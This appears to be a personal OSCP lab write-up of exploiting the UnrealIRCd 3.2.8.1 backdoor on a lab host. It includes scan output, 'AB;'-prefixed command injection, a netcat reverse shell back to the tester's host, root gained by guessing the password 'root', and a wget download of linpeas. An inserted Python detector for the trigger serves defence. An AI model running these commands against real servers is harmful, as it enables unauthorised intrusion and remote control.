Portal to my Matrix (Professional Portfolio)
Target is 192.168.54.120
connecting via openvpn
openvpn oscp.vpn
nmap -sC -sV -p- -vv 192.168.54.120
PORT STATE SERVICE REASON VERSION
6667/tcp open irc syn-ack UnrealIRCd (Admin email example@example.com)
6697/tcp open irc syn-ack UnrealIRCd
8067/tcp open irc syn-ack UnrealIRCd (Admin email example@example.com)
Service Info: Host: irc.foonet.com
IRC URL no dice
searchsploit UnrealIRCd
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Exec | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration S | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Exe | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit -v -w linux/remote/16922.rb
[i] Unable to detect version in terms: linux/remote/16922.rb
[i] Enabling 'searchsploit --strict'
-------------------------------- --------------------------------------------
Exploit Title | URL
-------------------------------- --------------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor C | https://www.exploit-db.com/exploits/16922
So it seems I literally only need to prepend my commands with "AB;" lol
Now to test if the connection works
Checked ifconfig and I'm connected to the LAN via eth0 as 192.168.49.54
sudo tcpdump -i eth0 icmp
Now to connect to IRC
nc 192.168.54.120 6667 -vvv
While my hostname is being resolved I'll pass in a command here
AB;ping -c 1 192.168.49.54
The ping went through. Seems that even though the IRC failed to validate, the command still goes through
Netcat listener time
nc -nvlp 7777
p has to be at the end
Now to send the reverse shell connection from the target
AB;nc 192.168.49.54 7777 -e /bin/bash
We're in 👍
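For the defensive side of the behaviour seen above, here is an added example (not part of the original writeup and not UnrealIRCd code) that flags client lines beginning with "AB;" on the IRC ports from the scan, even when the line is split across TCP segments. The class name, the 4096-byte cap and the sample segments are assumptions constructed for illustration.

```python
from collections import defaultdict

IRC_PORTS = {6667, 6697, 8067}  # ports the nmap scan above reported as UnrealIRCd
TRIGGER = b"AB;"                # prefix used in this writeup
MAX_TAIL = 4096                 # cap on buffered bytes per unterminated line


class BackdoorTriggerDetector:
    """Hypothetical helper: reassembles client-to-server bytes per flow and
    flags any line that begins with TRIGGER."""

    def __init__(self, ports=IRC_PORTS):
        self.ports = set(ports)
        self.tails = defaultdict(bytes)  # flow tuple -> bytes after last newline
        self.alerts = []

    def feed(self, src, sport, dst, dport, payload):
        """Feed one TCP segment payload; return the alerts it completed."""
        if dport not in self.ports:
            return []
        flow = (src, sport, dst, dport)
        *lines, tail = (self.tails[flow] + payload).split(b"\n")
        self.tails[flow] = tail[:MAX_TAIL]  # keep the line start, bound memory
        new = [
            {"src": src, "dst": dst, "dport": dport,
             "command": line[len(TRIGGER):].rstrip(b"\r").decode("latin-1")}
            for line in lines if line.startswith(TRIGGER)
        ]
        self.alerts.extend(new)
        return new


# Constructed sample segments; addresses are the ones used in this writeup.
ME, TARGET = "192.168.49.54", "192.168.54.120"
SAMPLE = [
    (ME, 40000, TARGET, 6667, b"NICK guest\r\nUSER guest 0 * :guest\r\n"),
    (ME, 40001, TARGET, 6667, b"AB;ping -c 1 192."),   # trigger split across
    (ME, 40001, TARGET, 6667, b"168.49.54\n"),         # two segments
    (ME, 40002, TARGET, 80, b"AB;not an IRC port\n"),
    (ME, 40003, TARGET, 8067, b"PRIVMSG #chan :AB;mid-line text\r\n"),
]


def run_sample():
    det = BackdoorTriggerDetector()
    for seg in SAMPLE:
        det.feed(*seg)
    return det.alerts


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Port 6697 is conventionally IRC over TLS, so payload matching there needs decrypted traffic or a server-side hook.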
Now rifling through the home directory I find local.txt
Contains the user flag
Shell Upgrade:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now I want root after getting inside.
Method #1 - Guess
Actually try root
su root
root
Then go to root's home
cd ~
There is proof.txt
root flag obtained 🏁
Method #2 - Run tools - linpeas
https://www.kali.org/tools/peass-ng/#linpeas
Upload linpeas.sh https://linpeas.sh/
https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files.html
On Kali: python -m SimpleHTTPServer 9999
On Server: wget 192.168.49.54:9999/linpeas.sh
Guides utilized: